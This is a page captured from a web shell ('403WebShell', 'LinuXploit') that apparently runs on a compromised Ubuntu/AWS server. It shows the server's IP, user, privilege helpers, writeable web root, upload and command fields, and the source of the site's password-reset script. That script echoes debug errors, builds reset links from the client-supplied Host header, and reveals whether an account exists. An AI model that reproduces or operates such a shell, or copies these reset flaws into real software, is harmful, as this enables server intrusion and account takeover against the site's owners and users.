Uname:Linux ip-10-0-5-176 6.8.0-1057-aws #60~22.04.1-Ubuntu SMP Wed May 27 08:16:59 UTC 2026 x86_64

403WebShell
403Webshell
Server IP : 3.111.61.48  /  Your IP : 216.73.216.67
Web Server : Apache
System : Linux ip-10-0-5-176 6.8.0-1057-aws #60~22.04.1-Ubuntu SMP Wed May 27 08:16:59 UTC 2026 x86_64
User : ubuntu ( 1000)
PHP Version : 8.2.31
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/vhost/itms.arukustech.com/public/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/vhost/itms.arukustech.com/public/forgot.php
<?php
// DEBUG ENABLED
error_reporting(E_ALL);
ini_set('display_errors', 1);
// Load dependencies and environment
require_once __DIR__ . '/../vendor/autoload.php';
require_once __DIR__ . '/../config/env_loader.php';
require_once __DIR__ . '/../app/db.php';

use PHPMailer\PHPMailer\PHPMailer;
use PHPMailer\PHPMailer\Exception;

$message = "";

if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $email = trim($_POST['email']);
    $pdo = db();

    // 1. Verify if the user exists
    $stmt = $pdo->prepare("SELECT id FROM users WHERE email = ? LIMIT 1");
    $stmt->execute([$email]);
    $user = $stmt->fetch(PDO::FETCH_ASSOC);

    if ($user) {
        // 2. Generate a secure token and expiry (valid for 1 hour)
        $token = bin2hex(random_bytes(32));
        $expiry = date("Y-m-d H:i:s", strtotime("+1 hour"));

        // 3. Update database with token (Make sure columns exist in your users table)
        $update = $pdo->prepare("UPDATE users SET reset_token = ?, reset_token_expiry = ? WHERE email = ?");
        $update->execute([$token, $expiry, $email]);

        // 4. Construct the reset link
        $protocol = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? "https://" : "http://";
        $resetLink = $protocol . $_SERVER['HTTP_HOST'] . "/reset_password.php?token=" . $token;

        // 5. Send Email using your existing env variables
        $mail = new PHPMailer(true);

        try {
            // SMTP Config
            $mail->isSMTP();
            $mail->Host       = env('SMTP_HOST');
            $mail->SMTPAuth   = true;
            $mail->Username   = env('SMTP_USERNAME');
            $mail->Password   = env('SMTP_PASSWORD');
            $mail->Port       = env('SMTP_PORT');
            $mail->SMTPSecure = env('SMTP_SECURE');

            // Metadata
            $mail->setFrom(env('MAIL_FROM'), env('COMPANY_NAME'));
            $mail->addAddress($email);

            $mail->isHTML(true);
            $mail->Subject = "Password Reset Request";
            $mail->Body    = "
                <div style='font-family: Arial, sans-serif; max-width: 600px; margin: auto; border: 1px solid #e2e8f0; padding: 20px; border-radius: 10px;'>
                    <h2 style='color: #1e293b;'>Password Reset Request</h2>
                    <p>Hello,</p>
                    <p>You requested to reset your password. Please click the button below to set a new password. This link will expire in 1 hour.</p>
                    <div style='text-align: center; margin: 30px 0;'>
                        <a href='$resetLink' style='background: #2563eb; color: white; padding: 12px 25px; text-decoration: none; border-radius: 5px; font-weight: bold;'>Reset My Password</a>
                    </div>
                    <p style='color: #64748b; font-size: 0.85rem;'>If you did not request this, please ignore this email.</p>
                </div>";

            $mail->send();
            $message = "<div class='alert alert-success'>A reset link has been sent to your email address.</div>";
        } catch (Exception $e) {
            $message = "<div class='alert alert-danger'>Email could not be sent. Mailer Error: {$mail->ErrorInfo}</div>";
        }
    } else {
        $message = "<div class='alert alert-danger'>No account found with that email address.</div>";
    }
}
?>

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Forgot Password</title>
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">
    <link href="https://cdn.jsdelivr.net/npm/remixicon@2.5.0/fonts/remixicon.css" rel="stylesheet">
    <style>
        body { background: #f1f5f9; height: 100vh; display: flex; align-items: center; justify-content: center; }
        .forgot-card { width: 100%; max-width: 400px; background: #fff; padding: 30px; border-radius: 15px; border: 1px solid #e2e8f0; }
        .brand-icon { font-size: 2.5rem; color: #2563eb; margin-bottom: 15px; }
    </style>
</head>
<body>

<div class="forgot-card shadow-sm text-center">
    <div class="brand-icon"><i class="ri-lock-password-line"></i></div>
    <h4 class="fw-bold">Forgot Password</h4>
    <p class="text-muted mb-4 small">Enter your registered email to receive a reset link.</p>

    <?= $message ?>

    <form method="POST" class="text-start">
        <div class="mb-3">
            <label class="form-label fw-bold small">Email Address</label>
            <input type="email" name="email" class="form-control" placeholder="name@company.com" required>
        </div>
        <button type="submit" class="btn btn-primary w-100 py-2 fw-bold">Send Reset Link</button>
    </form>

    <div class="mt-4">
        <a href="login.php" class="text-decoration-none small text-primary"><i class="ri-arrow-left-line"></i> Back to Login</a>
    </div>
</div>

</body>
</html>

Youez - 2016 - github.com/yon3zu
LinuXploit